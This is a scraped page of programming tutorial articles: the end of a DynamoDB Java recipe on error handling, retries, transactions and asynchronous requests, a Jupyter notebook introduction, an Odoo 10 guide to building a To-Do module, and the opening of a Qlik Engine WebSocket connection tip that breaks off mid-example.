.withBoolean("isProductionStopped", true) .withNumber("price", 45); PutItemOutcome outcome = table.putItem(product); System.out.println(outcome.getPutItemResult()); } catch (AmazonServiceException ase) { System.out.println("Error Message: " + ase.getMessage()); System.out.println("HTTP Status Code: " + ase.getStatusCode()); System.out.println("AWS Error Code: " + ase.getErrorCode()); System.out.println("Error Type: " + ase.getErrorType()); System.out.println("Request ID: " + ase.getRequestId()); } catch (AmazonClientException e) { System.out.println("Amazon Client Exception :" + e.getMessage()); } We should first catch AmazonServiceException, which arrives if the service you are trying to access throws any exception. AmazonClientException should be put last in order to catch any client-related exceptions. How it works… Amazon assigns a unique request ID for each and every request that it receives. Keeping this request ID is very important if something goes wrong, and if you would like to know what happened, then this request ID is the only source of information. We need to contact Amazon to know more about the request ID. There are two types of errors in AWS: Client errors: These errors normally occur when the request we submit is incorrect. The client errors are normally shown with a status code starting with 4XX. These errors normally occur when there is an authentication failure, bad requests, missing required attributes, or for exceeding the provisioned throughput. These errors normally occur when users provide invalid inputs. Server errors: These errors occur when there is something wrong from Amazon's side and they occur at runtime. The only way to handle such errors is retries; and if it does not succeed, you should log the request ID, and then you can reach the Amazon support with that ID to know more about the details. You can read more about DynamoDB specific errors at http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/ErrorHandling.html. Performing auto-retries on DynamoDB errors As mentioned in the previous recipe, we can perform auto-retries on DynamoDB requests if we get errors. In this recipe, we are going to see how to perform auto=retries. Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… Auto-retries are required if we get any errors during the first request. We can use the Amazon client configurations to set our retry strategy. By default, the DynamoDB client auto-retries a request if any error is generated three times. If we think that this is not efficient for us, then we can define this on our own, as follows: First of all, we need to create a custom implementation of RetryCondition. It contains a method called shouldRetry, which we need to implement as per our needs. Here is a sample CustomRetryCondition class: public class CustomRetryCondition implements RetryCondition { public boolean shouldRetry(AmazonWebServiceRequest originalRequest, AmazonClientException exception, int retriesAttempted) { if (retriesAttempted < 3 && exception.isRetryable()) { return true; } else { return false; } } } Similarly, we can implement CustomBackoffStrategy. The back-off strategy gives a hint on after what time the request should be retried. You can choose either a flat back-off time or an exponential back-off time: public class CustomBackoffStrategy implements BackoffStrategy { /** Base sleep time (milliseconds) **/ private static final int SCALE_FACTOR = 25; /** Maximum exponential back-off time before retrying a request */ private static final int MAX_BACKOFF_IN_MILLISECONDS = 20 * 1000; public long delayBeforeNextRetry(AmazonWebServiceRequest originalRequest, AmazonClientException exception, int retriesAttempted) { if (retriesAttempted < 0) return 0; long delay = (1 << retriesAttempted) * SCALE_FACTOR; delay = Math.min(delay, MAX_BACKOFF_IN_MILLISECONDS); return delay; } } Next, we need to create an instance of RetryPolicy, and set the RetryCondition and BackoffStrategy classes, which we created. Apart from this, we can also set a maximum number of retries. The last parameter is honorMaxErrorRetryInClientConfig. It means whether this retry policy should honor the maximum error retry set by ClientConfiguration.setMaxErrorRetry(int): RetryPolicy retryPolicy = new RetryPolicy(customRetryCondition, customBackoffStrategy, 3, false); Now, initiate the ClientConfiguration, and set the RetryPolicy we created earlier: ClientConfiguration clientConfiguration = new ClientConfiguration(); clientConfiguration.setRetryPolicy(retryPolicy); Now, we need to set this client configuration when we initiate the AmazonDynamoDBClient; and once done, your retry policy with a custom back-off strategy will be in place: AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider(), clientConfiguration); How it works… Auto-retries are quite handy when we receive a sudden burst in DynamoDB requests. If there are more number of requests than the provisioned throughputs, then auto-retries with an exponential back-off strategy will definitely help in handling the load. So if the client gets an exception, then it will get auto retried after sometime; and if by then the load is less, then there wouldn't be any loss for your application. The Amazon DynamoDB client internally uses HttpClient to make the calls, which is quite a popular and reliable implementation. So if you need to handle such cases, this kind of an implementation is a must. In case of batch operations, if any failure occurs, DynamoDB does not fail the complete operation. In case of batch write operations, if a particular operation fails, then DynamoDB returns the unprocessed items, which can be retried. Performing atomic transactions on DynamoDB tables I hope we are all aware that operations in DynamoDB are eventually consistent. Considering this nature it obviously does not support transactions the way we do in RDBMS. A transaction is a group of operations that need to be performed in one go, and they should be handled in an atomic nature. (If one operation fails, the complete transaction should be rolled back.) There might be use cases where you would need to perform transactions in your application. Considering this need, AWS has provided open sources, client-side transaction libraries, which helps us achieve atomic transactions in DynamoDB. In this recipe, we are going to see how to perform transactions on DynamoDB. Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… To get started, we will first need to download the source code of the library from GitHub and build the code to generate the JAR file. You can download the code from https://github.com/awslabs/dynamodb-transactions/archive/master.zip. Next, extract the code and run the following command to generate the JAR file: mvn clean install –DskipTests On a successful build, you will see a JAR generated file in the target folder. Add this JAR to the project by choosing a configure build path in Eclipse: Now, let's understand how to use transactions. For this, we need to create the DynamoDB client and help this client to create two helper tables. The first table would be the Transactions table to store the transactions, while the second table would be the TransactionImages table to keep the snapshots of the items modified in the transaction: AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); // Create transaction table TransactionManager.verifyOrCreateTransactionTable(client, "Transactions", 10, 10, (long) (10 * 60)); // Create transaction images table TransactionManager.verifyOrCreateTransactionImagesTable(client, "TransactionImages", 10, 10, (long) (60 * 10)); Next, we need to create a transaction manager by providing the names of the tables we created earlier: TransactionManager txManager = new TransactionManager(client, "Transactions", "TransactionImages"); Now, we create one transaction, and perform the operations you will need to do in one go. Consider our product table where we need to add two new products in one single transaction, and the changes will reflect only if both the operations are successful. We can perform these using transactions, as follows: Transaction t1 = txManager.newTransaction(); Map<String, AttributeValue> product = new HashMap<String, AttributeValue>(); AttributeValue id = new AttributeValue(); id.setN("250"); product.put("id", id); product.put("type", new AttributeValue("phone")); product.put("name", new AttributeValue("MI4")); t1.putItem(new PutItemRequest("productTable", product)); Map<String, AttributeValue> product1 = new HashMap<String, AttributeValue>(); id.setN("350"); product1.put("id", id); product1.put("type", new AttributeValue("phone")); product1.put("name", new AttributeValue("MI3")); t1.putItem(new PutItemRequest("productTable", product1)); t1.commit(); Now, execute the code to see the results. If everything goes fine, you will see two new entries in the product table. In case of an error, none of the entries would be in the table. How it works… The transaction library when invoked, first writes the changes to the Transaction table, and then to the actual table. If we perform any update item operation, then it keeps the old values of that item in the TransactionImages table. It also supports multi-attribute and multi-table transactions. This way, we can use the transaction library and perform atomic writes. It also supports isolated reads. You can refer to the code and examples for more details at https://github.com/awslabs/dynamodb-transactions. Performing asynchronous requests to DynamoDB Till now, we have used a synchronous DynamoDB client to make requests to DynamoDB. Synchronous requests block the thread unless the operation is not performed. Due to network issues, sometimes, it can be difficult for the operation to get completed quickly. In that case, we can go for asynchronous client requests so that we submit the requests and do some other work. Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… Asynchronous client is easy to use: First, we need to the AmazonDynamoDBAsync class: AmazonDynamoDBAsync dynamoDBAsync = new AmazonDynamoDBAsyncClient( new ProfileCredentialsProvider()); Next, we need to create the request to be performed in an asynchronous manner. Let's say we need to delete a certain item from our product table. Then, we can create the DeleteItemRequest, as shown in the following code snippet: Map<String, AttributeValue> key = new HashMap<String, AttributeValue>(); AttributeValue id = new AttributeValue(); id.setN("10"); key.put("id", id); key.put("type", new AttributeValue("phone")); DeleteItemRequest deleteItemRequest = new DeleteItemRequest( "productTable", key); Next, invoke the deleteItemAsync method to delete the item. Here, we can optionally define AsyncHandler if we want to use the result of the request we had invoked. Here, I am also printing the messages with time so that we can confirm its asynchronous nature: dynamoDBAsync.deleteItemAsync(deleteItemRequest, new AsyncHandler<DeleteItemRequest, DeleteItemResult>() { public void onSuccess(DeleteItemRequest request, DeleteItemResult result) { System.out.println("Item deleted successfully: "+ System.currentTimeMillis()); } public void onError(Exception exception) { System.out.println("Error deleting item in async way"); } }); System.out.println("Delete item initiated" + System.currentTimeMillis()); How it works Asynchronous clients use AsyncHttpClient to invoke the DynamoDB APIs. This is a wrapper implementation on top of Java asynchronous APIs. Hence, they are quite easy to use and understand. The AsyncHandler is an optional configuration you can do in order to use the results of asynchronous calls. We can also use the Java Future object to handle the response. Summary We have covered various recipes on cost and performance efficient use of DynamoDB. Recipes like error handling and auto retries helps readers in make their application robust. It also highlights use of transaction library in order to implement atomic transaction on DynamoDB. Resources for Article: Further resources on this subject: The EMR Architecture[article] Amazon DynamoDB - Modelling relationships, Error handling[article] Index, Item Sharding, and Projection in DynamoDB [article]
Read more
  • 0
  • 0
  • 14696

article-image-getting-started-jupyter-notebook-part-1
Marin Gilles
02 Feb 2016
5 min read
Save for later

Getting started with the Jupyter notebook (part 1)

Marin Gilles
02 Feb 2016
5 min read
The Jupyter notebook (previously known as IPython notebooks) is an interactive notebook, in which you can run code from more than 40 programming languages. In this introduction, we will explore the main features of the Jupyter notebook and see why it can be such a poweful tool for anyone wanting to create beautiful interactive documents and educational resources. To start this working with the notebook, you will need to install it. You can find the full procedure on the Jupyter website. jupyter notebook You will see something similar to the following displayed : [I 20:06:36.367 NotebookApp] Writing notebook server cookie secret to /run/user/1000/jupyter/notebook_cookie_secret [I 20:06:36.813 NotebookApp] Serving notebooks from local directory: /home/your_username [I 20:06:36.813 NotebookApp] 0 active kernels [I 20:06:36.813 NotebookApp] The IPython Notebook is running at: http://localhost:8888/ [I 20:06:36.813 NotebookApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation). And the main Jupyter window should open in the folder you started the notebook (usually your user folder). The main window looks like this : To create a new notebook, simply click on New and choose the kind of notebook you wish to start under the notebooks section. I only have a Python kernel installed locally, so I will start a Python notebook to start working with. A new tab opens, and I get the notebook interface, completely empty. You can see different parts of the notebook: Name of your notebook Main toolbar, with options to save your notebook, export, reload, un notebook[RB1] , restart kernel, etc. Shortcuts The main part of the notebook, containing the contents of your notebook Take the time to explore the menus and see your options. If you need help on a very specific subject, concerning the notebook or some libraries, you can try the help menu at the right end of the menu bar. In the main area, you can see what is called a cell. Each notebook is composed of multiple cells, and each cell will be used for a different purpose. The first cell we have here, starting with In [ ] is a code cell. In this type of cell, you can type any code and execute it. For example, try typing 1 + 2 then hit Shift + Enter. When hitting Shift + Enter, the code in the cell will be evaluated, you will be placed in a new cell, and you will get the following: You can easily identify the current working cell thanks to the green outline. Let's type something else in the second cell, for example: for i in range(5): print(i) When evaluating this cell, you then get: As previously, the code is evaluated and the results are dislayed properly. You may notice there is no Out[2] this time. This is because we printed the results, and no value was returned. One very interesting feature of the notebook is that you can go back in a cell, change it and reevaluate it again, thus updating your whole document. Try this by going back to the first cell, changing 1 + 2 to 2 + 3, and reevaulating the cell, by pressing Shift + Enter. You will notice the result was updated to 5 as soon as you evaluated the cell. This can be very powerful when you want to explore data or test an equation with different parameters without having to reevaluate your whole script. You can, however, reevaluate the whole notebook at once, by going to Cell -> Run all. Now that we’ve seen how to enter code, why not try and get a more beautiful and explanatory notebook? To do this, we will use other types of cells, the Header and Markdown cells. First, let's add a title to our notebook at the very top. To do that, select the first cell, then click Insert -> Insert cell above. As you can see, a new cell was added at the very top of your document. However, this looks exactly like the previous one. Let's make it a title cell by clicking on the cell type menu, in the shortcut toolbar: You then change it to Heading. A pop-up will be displayed explaining how to create different levels of titles, and you will be left with a different type of cell: This cell starts with a # sign, meaning this is a level one title. If you want to make subtitles, you can just use the following notation (explained in the pop-up showing up when changing the cell type): # : First level title ## : Second level title ### : Third level title ... Write your title after the #, then evaluate the cell. You will see the display changing to show a very nice looking title. I added a few other title cells as an example, and an exercise for you: After adding our titles, let's add a few explanations about what we do in each code cell. For this, we will add a cell where we want it to be, and then change its type to Markdown. Then, evaluate your cell. That's it: your text is displayed beautifully! To finish this first introduction, you can rename your notebook by going to File -> Rename and inputing the new name of your notebook. It will then be displayed on the top left of your window, next to the Jupyter logo. In the next part of this introduction, we will go deeper in the capabilities of the notebook and the integration with other Python libraries. Click here to carry on reading now! About the author Marin Gilles is a PhD student in Physics, in Dijon, France. A large part of his work is dedicated to physical simulations for which he developed his own simulation framework using Python, and contributed to open-source libraries such as Matplotlib or IPython.
Read more
  • 0
  • 0
  • 14667

article-image-building-your-first-odoo-application
Packt
02 Jan 2017
22 min read
Save for later

Building Your First Odoo Application

Packt
02 Jan 2017
22 min read
In this article by, Daniel Reis, the author of the book Odoo 10 Development Essentials, we will create our first Odoo application and learn the steps needed make it available to Odoo and install it. (For more resources related to this topic, see here.) Inspired by the notable http://todomvc.com/ project, we will build a simple To-Do application. It should allow us to add new tasks, mark them as completed, and finally clear the task list from all the already completed tasks. Understanding applications and modules It's common to hear about Odoo modules and applications. But what exactly is the difference between them? Module add-ons are building blocks for Odoo applications. A module can add new features to Odoo, or modify existing ones. It is a directory containing a manifest, or descriptor file, named __manifest__.py, plus the remaining files that implement its features. Applications are the way major features are added to Odoo. They provide the core elements for a functional area, such as Accounting or HR, based on which additional add-on modules modify or extend features. Because of this, they are highlighted in the Odoo Apps menu. If your module is complex, and adds new or major functionality to Odoo, you might consider creating it as an application. If you module just makes changes to existing functionality in Odoo, it is likely not an application. Whether a module is an application or not is defined in the manifest. Technically is does not have any particular effect on how the add-on module behaves. It is only used for highlight on the Apps list. Creating the module basic skeleton We should have the Odoo server at ~/odoo-dev/odoo/. To keep things tidy, we will create a new directory alongside it to host our custom modules, at ~/odoo-dev/custom-addons. Odoo includes a scaffold command to automatically create a new module directory, with a basic structure already in place. You can learn more about it with: $ ~/odoo-dev/odoo/odoo-bin scaffold --help You might want to keep this in mind when you start working your next module, but we won't be using it right now, since we will prefer to manually create all the structure for our module. An Odoo add-on module is a directory containing a __manifest__.py descriptor file. In previous versions, this descriptor file was named __openerp__.py. This name is still supported, but is deprecated. It also needs to be Python-importable, so it must also have an __init__.py file. The module's directory name is its technical name. We will use todo_app for it. The technical name must be a valid Python identifier: it should begin with a letter and can only contain letters, numbers, and the underscore character. The following commands create the module directory and create an empty __init__.py file in it, ~/odoo-dev/custom-addons/todo_app/__init__.py. In case you would like to do that directly from the command line, this is what you would use: $ mkdir ~/odoo-dev/custom-addons/todo_app $ touch ~/odoo-dev/custom-addons/todo_app/__init__.py Next, we need to create the descriptor file. It should contain only a Python dictionary with about a dozen possible attributes; of this, only the name attribute is required. A longer description attribute and the author attribute also have some visibility and are advised. We should now add a __manifest__.py file alongside the __init__.py file with the following content: { 'name': 'To-Do Application', 'description': 'Manage your personal To-Do tasks.', 'author': 'Daniel Reis', 'depends': ['base'], 'application': True, } The depends attribute can have a list of other modules that are required. Odoo will have them automatically installed when this module is installed. It's not a mandatory attribute, but it's advised to always have it. If no particular dependencies are needed, we should depend on the core base module. You should be careful to ensure all dependencies are explicitly set here; otherwise, the module may fail to install in a clean database (due to missing dependencies) or have loading errors, if by chance the other required modules are loaded afterwards. For our application, we don't need any specific dependencies, so we depend on the base module only. To be concise, we chose to use very few descriptor keys, but in a real word scenario, we recommend that you also use the additional keys since they are relevant for the Odoo apps store: summary: This is displayed as a subtitle for the module. version: By default, is 1.0. It should follow semantic versioning rules (see http://semver.org/ for details). license: By default, is LGPL-3. website: This is a URL to find more information about the module. This can help people find more documentation or the issue tracker to file bugs and suggestions. category: This is the functional category of the module, which defaults to Uncategorized. The list of existing categories can be found in the security groups form (Settings | User | Groups), in the Application field drop-down list. These other descriptor keys are also available: installable: It is by default True but can be set to False to disable a module. auto_install: If the auto_install module is set to True, this module will be automatically installed, provided all its dependencies are already installed. It is used for the Glue modules. Since Odoo 8.0, instead of the description key, we can use a README.rst or README.md file in the module's top directory. A word about licenses Choosing a license for your work is very important, and you should consider carefully what is the best choice for you, and its implications. The most used licenses for Odoo modules are the GNU Lesser General Public License (LGLP) and the Affero General Public License (AGPL). The LGPL is more permissive and allows commercial derivate work, without the need to share the corresponding source code. The AGPL is a stronger open source license, and requires derivate work and service hosting to share their source code. Learn more about the GNU licenses at https://www.gnu.org/licenses/. Adding to the add-ons path Now that we have a minimalistic new module, we want to make it available to the Odoo instance. For that, we need to make sure the directory containing the module is in the add-ons path, and then update the Odoo module list. We will position in our work directory and start the server with the appropriate add-ons path configuration: $ cd ~/odoo-dev $ ./odoo/odoo-bin -d todo --addons-path="custom-addons,odoo/addons" --save The --save option saves the options you used in a config file. This spares us from repeating them every time we restart the server: just run ./odoo-bin and the last saved options will be used. Look closely at the server log. It should have an INFO ? odoo: addons paths:[...] line. It should include our custom-addons directory. Remember to also include any other add-ons directories you might be using. For instance, if you also have a ~/odoo-dev/extra directory containing additional modules to be used, you might want to include them also using the option: --addons-path="custom-addons,extra,odoo/addons" Now we need the Odoo instance to acknowledge the new module we just added. Installing the new module In the Apps top menu, select the Update Apps List option. This will update the module list, adding any modules that may have been added since the last update to the list. Remember that we need the developer mode enabled for this option to be visible. That is done in the Settings dashboard, in the link at the bottom right, below the Odoo version number information . Make sure your web client session is working with the right database. You can check that at the top right: the database name is shown in parenthesis, right after the user name. A way to enforce using the correct database is to start the server instance with the additional option --db-filter=^MYDB$. The Apps option shows us the list of available modules. By default it shows only application modules. Since we created an application module we don't need to remove that filter to see it. Type todo in the search and you should see our new module, ready to be installed. Now click on the module's Install button and we're ready! The Model layer Now that Odoo knows about our new module, let's start by adding a simple model to it. Models describe business objects, such as an opportunity, sales order, or partner (customer, supplier, and so on.). A model has a list of attributes and can also define its specific business. Models are implemented using a Python class derived from an Odoo template class. They translate directly to database objects, and Odoo automatically takes care of this when installing or upgrading the module. The mechanism responsible for this is Object Relational Model (ORM). Our module will be a very simple application to keep to-do tasks. These tasks will have a single text field for the description and a checkbox to mark them as complete. We should later add a button to clean the to-do list from the old completed tasks. Creating the data model The Odoo development guidelines state that the Python files for models should be placed inside a models subdirectory. For simplicity, we won't be following this here, so let's create a todo_model.py file in the main directory of the todo_app module. Add the following content to it: # -*- coding: utf-8 -*- from odoo import models, fields class TodoTask(models.Model): _name = 'todo.task' _description = 'To-do Task' name = fields.Char('Description', required=True) is_done = fields.Boolean('Done?') active = fields.Boolean('Active?', default=True) The first line is a special marker telling the Python interpreter that this file has UTF-8 so that it can expect and handle non-ASCII characters. We won't be using any, but it's a good practice to have it anyway. The second line is a Python import statement, making available the models and fields objects from the Odoo core. The third line declares our new model. It's a class derived from models.Model. The next line sets the _name attribute defining the identifier that will be used throughout Odoo to refer to this model. Note that the actual Python class name , TodoTask in this case, is meaningless to other Odoo modules. The _name value is what will be used as an identifier. Notice that this and the following lines are indented. If you're not familiar with Python, you should know that this is important: indentation defines a nested code block, so these four lines should all be equally indented. Then we have the _description model attribute. It is not mandatory, but it provides a user friendly name for the model records, that can be used for better user messages. The last three lines define the model's fields. It's worth noting that name and active are special field names. By default, Odoo will use the name field as the record's title when referencing it from other models. The active field is used to inactivate records, and by default, only active records will be shown. We will use it to clear away completed tasks without actually deleting them from the database. Right now, this file is not yet used by the module. We must tell Python to load it with the module in the __init__.py file. Let's edit it to add the following line: from . import todo_model That's it. For our Python code changes to take effect the server instance needs to be restarted (unless it was using the --dev mode). We won't see any menu option to access this new model, since we didn't add them yet. Still we can inspect the newly created model using the Technical menu. In the Settings top menu, go to Technical | Database Structure | Models, search for the todo.task model on the list and then click on it to see its definition: If everything goes right, it is confirmed that the model and fields were created. If you can't see them here, try a server restart with a module upgrade, as described before. We can also see some additional fields we didn't declare. These are reserved fields Odoo automatically adds to every new model. They are as follows: id: A unique, numeric identifier for each record in the model. create_date and create_uid: These specify when the record was created and who created it, respectively. write_date and write_uid: These confirm when the record was last modified and who modified it, respectively. __last_update: This is a helper that is not actually stored in the database. It is used for concurrency checks. The View layer The View layer describes the user interface. Views are defined using XML, which is used by the web client framework to generate data-aware HTML views. We have menu items that can activate the actions that can render views. For example, the Users menu item processes an action also called Users, that in turn renders a series of views. There are several view types available, such as the list and form views, and the filter options made available are also defined by particular type of view, the search view. The Odoo development guidelines state that the XML files defining the user interface should be placed inside a views/ subdirectory. Let's start creating the user interface for our To-Do application. Adding menu items Now that we have a model to store our data, we should make it available on the user interface. For that we should add a menu option to open the To-do Task model so that it can be used. Create the views/todo_menu.xml file to define a menu item and the action performed by it: <?xml version="1.0"?> <odoo> <!-- Action to open To-do Task list --> <act_window id="action_todo_task" name="To-do Task" res_model="todo.task" view_mode="tree,form" /> <!-- Menu item to open To-do Task list --> <menuitem id="menu_todo_task" name="Todos" action="action_todo_task" /> </odoo> The user interface, including menu options and actions, is stored in database tables. The XML file is a data file used to load those definitions into the database when the module is installed or upgraded. The preceding code is an Odoo data file, describing two records to add to Odoo: The <act_window> element defines a client-side window action that will open the todo.task model with the tree and form views enabled, in that order The <menuitem> defines a top menu item calling the action_todo_task action, which was defined before Both elements include an id attribute. This id , also called an XML ID, is very important: it is used to uniquely identify each data element inside the module, and can be used by other elements to reference it. In this case, the <menuitem> element needs to reference the action to process, and needs to make use of the <act_window> id for that. Our module does not know yet about the new XML data file. This is done by adding it to the data attribute in the __manifest__.py file. It holds the list of files to be loaded by the module. Add this attribute to the descriptor's dictionary: 'data': ['views/todo_menu.xml'], Now we need to upgrade the module again for these changes to take effect. Go to the Todos top menu and you should see our new menu option available: Even though we haven't defined our user interface view, clicking on the Todos menu will open an automatically generated form for our model, allowing us to add and edit records. Odoo is nice enough to automatically generate them so that we can start working with our model right away. Odoo supports several types of views, but the three most important ones are: tree (usually called list views), form, and search views. We'll add an example of each to our module. Creating the form view All views are stored in the database, in the ir.ui.view model. To add a view to a module, we declare a <record> element describing the view in an XML file, which is to be loaded into the database when the module is installed. Add this new views/todo_view.xml file to define our form view: <?xml version="1.0"?> <odoo> <record id="view_form_todo_task" model="ir.ui.view"> <field name="name">To-do Task Form</field> <field name="model">todo.task</field> <field name="arch" type="xml"> <form string="To-do Task"> <group> <field name="name"/> <field name="is_done"/> <field name="active" readonly="1"/> </group> </form> </field> </record> </odoo> Remember to add this new file to the data key in manifest file, otherwise our module won't know about it and it won't be loaded. This will add a record to the ir.ui.view model with the identifier view_form_todo_task. The view is for the todo.task model and is named To-do Task Form. The name is just for information; it does not have to be unique, but it should allow one to easily identify which record it refers to. In fact the name can be entirely omitted, in that case it will be automatically generated from the model name and the view type. The most important attribute is arch, and contains the view definition, highlighted in the XML code above. The <form> tag defines the view type, and in this case contains three fields. We also added an attribute to the active field to make it read-only. Adding action buttons Forms can have buttons to perform actions. These buttons are able to trigger workflow actions, run window actions—such as opening another form, or run Python functions defined in the model. They can be placed anywhere inside a form, but for document-style forms, the recommended place for them is the <header> section. For our application, we will add two buttons to run the methods of the todo.task model: <header> <button name="do_toggle_done" type="object" string="Toggle Done" class="oe_highlight" /> <button name="do_clear_done" type="object" string="Clear All Done" /> </header> The basic attributes of a button comprise the following: The string attribute that has the text to be displayed on the button The type attribute referring to the action it performs The name attribute referring to the identifier for that action The class attribute, which is an optional attribute to apply CSS styles, like in regular HTML The complete form view At this point, our todo.task form view should look like this: <form> <header> <button name="do_toggle_done" type="object" string="Toggle Done" class="oe_highlight" /> <button name="do_clear_done" type="object" string="Clear All Done" /> </header> <sheet> <group name="group_top"> <group name="group_left"> <field name="name"/> </group> <group name="group_right"> <field name="is_done"/> <field name="active" readonly="1" /> </group> </group> </sheet> </form> Remember that for the changes to be loaded to our Odoo database, a module upgrade is needed. To see the changes in the web client, the form needs to be reloaded: either click again on the menu option that opens it or reload the browser page (F5 in most browsers). The action buttons won't work yet, since we still need to add their business logic. The business logic layer Now we will add some logic to our buttons. This is done with Python code, using the methods in the model's Python class. Adding business logic We should edit the todo_model.py Python file to add to the class the methods called by the buttons. First we need to import the new API, so add it to the import statement at the top of the Python file: from odoo import models, fields, api The action of the Toggle Done button will be very simple: just toggle the Is Done? flag. For logic on records, use the @api.multi decorator. Here, self will represent a recordset, and we should then loop through each record. Inside the TodoTask class, add this: @api.multi def do_toggle_done(self): for task in self: task.is_done = not task.is_done return True The code loops through all the to-do task records, and for each one, modifies the is_done field, inverting its value. The method does not need to return anything, but we should have it to at least return a True value. The reason is that clients can use XML-RPC to call these methods, and this protocol does not support server functions returning just a None value. For the Clear All Done button, we want to go a little further. It should look for all active records that are done and make them inactive. Usually, form buttons are expected to act only on the selected record, but in this case, we will want it also act on records other than the current one: @api.model def do_clear_done(self): dones = self.search([('is_done', '=', True)]) dones.write({'active': False}) return True On methods decorated with @api.model, the self variable represents the model with no record in particular. We will build a dones recordset containing all the tasks that are marked as done. Then, we set on the active flag to False on them. The search method is an API method that returns the records that meet some conditions. These conditions are written in a domain, which is a list of triplets. The write method sets the values at once on all the elements of a recordset. The values to write are described using a dictionary. Using write here is more efficient than iterating through the recordset to assign the value to each of them one by one. Set up access security You might have noticed that upon loading, our module is getting a warning message in the server log: The model todo.task has no access rules, consider adding one. The message is pretty clear: our new model has no access rules, so it can't be used by anyone other than the admin super user. As a super user, the admin ignores data access rules, and that's why we were able to use the form without errors. But we must fix this before other users can use our model. Another issue yet to address is that we want the to-do tasks to be private to each user. Odoo supports row-level access rules, which we will use to implement that. Adding access control security To get a picture of what information is needed to add access rules to a model, use the web client and go to Settings | Technical | Security | Access Controls List: Here we can see the ACL for some models. It indicates, per security group, what actions are allowed on records. This information has to be provided by the module using a data file to load the lines into the ir.model.access model. We will add full access to the Employee group on the model. Employee is the basic access group nearly everyone belongs to. This is done using a CSV file named security/ir.model.access.csv. Let's add it with the following content: id,name,model_id:id,group_id:id,perm_read,perm_write,perm_create,perm_unlink acess_todo_task_group_user,todo.task.user,model_todo_task,base.group_user,1,1,1,1 The filename corresponds to the model to load the data into, and the first line of the file has the column names. These are the columns provided by the CSV file: id: It is the record external identifier (also known as XML ID). It should be unique in our module. name: This is a description title. It is only informative and it's best if it's kept unique. Official modules usually use a dot-separated string with the model name and the group. Following this convention, we used todo.task.user. model_id: This is the external identifier for the model we are giving access to. Models have XML IDs automatically generated by the ORM: for todo.task, the identifier is model_todo_task. group_id: This identifies the security group to give permissions to. The most important ones are provided by the base module. The Employee group is such a case and has the identifier base.group_user. The last four perm fields flag the access to grant read, write, create, or unlink (delete) access. We must not forget to add the reference to this new file in the __manifest__.py descriptor's data attribute It should look like this: 'data': [ 'security/ir.model.access.csv', 'views/todo_view.xml', 'views/todo_menu.xml', ], As before, upgrade the module for these additions to take effect. The warning message should be gone, and we can confirm that the permissions are OK by logging in with the user demo (password is also demo). If we run our tests now it they should only fail the test_record_rule test case. Summary We created a new module from the start, covering the most frequently used elements in a module: models, the three basic types of views (form, list, and search), business logic in model methods, and access security. Always remember, when adding model fields, an upgrade is needed. When changing Python code, including the manifest file, a restart is needed. When changing XML or CSV files, an upgrade is needed; also, when in doubt, do both: restart the server and upgrade the modules. Resources for Article: Further resources on this subject: Getting Started with Odoo Development [Article] Introduction to Odoo [Article] Web Server Development [Article]
Read more
  • 0
  • 0
  • 14657

article-image-create-connection-qlik-engine-tip
Amey Varangaonkar
13 Jun 2018
8 min read
Save for later

5 ways to create a connection to the Qlik Engine [Tip]

Amey Varangaonkar
13 Jun 2018
8 min read
With mashups or web apps, the Qlik Engine sits outside of your project and is not accessible and loaded by default. The first step before doing anything else is to create a connection with the Qlik Engine, after which you can continue to open a session and perform further actions on that app, such as: Opening a document/app Making selections Retrieving visualizations and apps For using the Qlik Engine API, open a WebSocket to the engine. There may be a difference in the way you do this, depending on whether you are working with Qlik Sense Enterprise or Qlik Sense Desktop. In this article, we will elaborate on how you can achieve a connection to the Qlik engine and the benefits of doing so. The following excerpt has been taken from the book Mastering Qlik Sense, authored by Martin Mahler and Juan Ignacio Vitantonio. Creating a connection To create a connection using WebSockets, you first need to establish a new web socket communication line. To open a WebSocket to the engine, use one of the following URIs: Qlik Sense Enterprise Qlik Sense Desktop wss://server.domain.com:4747/app/ or wss://server.domain.com[/virtual proxy]/app/ ws://localhost:4848/app Creating a Connection using WebSockets In the case of Qlik Sense Desktop, all you need to do is define a WebSocket variable, including its connection string in the following way: var ws = new WebSocket("ws://localhost:4848/app/"); Once the connection is opened and checking for ws.open(), you can call additional methods to the engine using ws.send(). This example will retrieve the number of available documents in my Qlik Sense Desktop environment, and append them to an HTML list: <html> <body> <ul id='docList'> </ul> </body> </html> <script> var ws = new WebSocket("ws://localhost:4848/app/"); var request = { "handle": -1, "method": "GetDocList", "params": {}, "outKey": -1, "id": 2 } ws.onopen = function(event){ ws.send(JSON.stringify(request)); // Receive the response ws.onmessage = function (event) { var response = JSON.parse(event.data); if(response.method != ' OnConnected'){ var docList = response.result.qDocList; var list = ''; docList.forEach(function(doc){ list += '<li>'+doc.qDocName+'</li>'; }) document.getElementById('docList').innerHTML = list; } } } </script> The preceding example will produce the following output on your browser if you have Qlik Sense Desktop running in the background: All Engine methods and calls can be tested in a user-friendly way by exploring the Qlik Engine in the Dev Hub. A single WebSocket connection can be associated with only one engine session (consisting of the app context, plus the user). If you need to work with multiple apps, you must open a separate WebSocket for each one. If you wish to create a WebSocket connection directly to an app, you can extend the configuration URL to include the application name, or in the case of the Qlik Sense Enterprise, the GUID. You can then use the method from the app class and any other classes as you continue to work with objects within the app. var ws = new WebSocket("ws://localhost:4848/app/MasteringQlikSense.qvf"); Creating  Connection to the Qlik Server Engine Connecting to the engine on a Qlik Sense environment is a little bit different as you will need to take care of authentication first. Authentication is handled in different ways, depending on how you have set up your server configuration, with the most common ones being: Ticketing Certificates Header authentication Authentication also depends on where the code that is interacting with the Qlik Engine is running. If your code is running on a trusted computer, authentication can be performed in several ways, depending on how your installation is configured and where the code is running: If you are running the code from a trusted computer, you can use certificates, which first need to be exported via the QMC If the code is running on a web browser, or certificates are not available, then you must authenticate via the virtual proxy of the server Creating a connection using certificates Certificates can be considered as a seal of trust, which allows you to communicate with the Qlik Engine directly with full permission. As such, only backend solutions ever have access to certificates, and you should guard how you distribute them carefully. To connect using certificates, you first need to export them via the QMC, which is a relatively easy thing to do: Once they are exported, you need to copy them to the folder where your project is located using the following code: <html> <body> <h1>Mastering 